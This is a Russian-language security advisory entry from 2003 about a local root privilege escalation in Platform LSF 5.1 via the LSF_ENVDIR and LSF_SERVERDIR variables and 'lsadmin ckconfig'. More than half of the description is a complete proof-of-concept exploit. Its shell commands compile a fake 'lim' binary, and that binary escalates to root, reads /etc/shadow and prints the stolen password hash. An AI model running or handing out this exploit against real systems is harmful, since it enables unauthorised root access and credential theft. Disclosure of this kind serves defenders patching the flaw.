Дата публикации: | 27.05.2003 |
Всего просмотров: | 1199 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в Platform Computing's Platform LSF. Локальный пользователь может получить root привилегии на системе.
Сообщается, что локальный пользователь может установить переменную LSF_ENVDIR, чтобы заставить 'lsadmin' использовать альтернативный 'lsf.conf' файл. Локальный пользователь может также установить LSF_SERVERDIR переменную в 'lsf.conf' файле к альтернативному местоположению, в котором содержится злонамеренная 'lim' программа. Затем, запуская 'lsadmin' ckconfig команду, может выполнить злонамеренный 'lim' код с root привилегиями. Эксплоит: # LSF 5.1 'lsadmin' local root exploit # 2003.03.20 - CADENCE of Lam3rZ # Proof of concept - for educational purposes only! cat <<__END__> attacker_code.c #include <stdio.h> int main() { FILE *secret_file; FILE *temp_file; char one_line[128]; setuid(0);setgid(0); secret_file = fopen("/etc/shadow", "r"); temp_file = fopen(".temp.file", "w"); fgets(one_line, 120, secret_file); fputs(one_line, temp_file); fclose(secret_file); fclose (temp_file); __END__ gcc attacker_code.c -o lim chmod 777 lim export LSF_SERVERDIR=. lsadmin ckconfig cat .temp.file rm -f attacker_code.c lim .temp.fileУязвимость обнаружена в Platform LSF 5.1 |
Ссылки: | Security advisory: LSF 5.1 local root exploit |